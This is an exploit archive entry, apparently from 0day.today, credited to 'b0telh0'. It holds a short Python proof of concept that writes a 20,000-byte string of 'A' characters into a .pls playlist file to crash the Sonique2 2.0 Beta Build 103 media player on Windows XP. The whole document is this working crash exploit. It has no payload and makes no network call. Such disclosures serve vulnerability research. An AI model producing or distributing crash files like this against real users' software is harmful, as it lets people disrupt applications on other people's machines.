id: 10162
date: 01/23/2010
title: Sonique2 v2.0 Beta Build 103 Local Crash PoC
author: b0telh0
cves: 

============================================
Sonique2 v2.0 Beta Build 103 Local Crash PoC
============================================

#!/usr/bin/python
#
# Title: Sonique2 2.0 Beta Build 103 Local Crash PoC
# Found by: b0telh0
# Tested on: Windows XP SP3
 
 
crash = "\x41" * 20000
 
try:
     file = open('b0t.pls','w');
     file.write(crash);
     file.close();
     print "[+] Created b0t.pls file."
except:
     print "[-] Error cant write file to system."



#  0day.today [2023-03-24]  #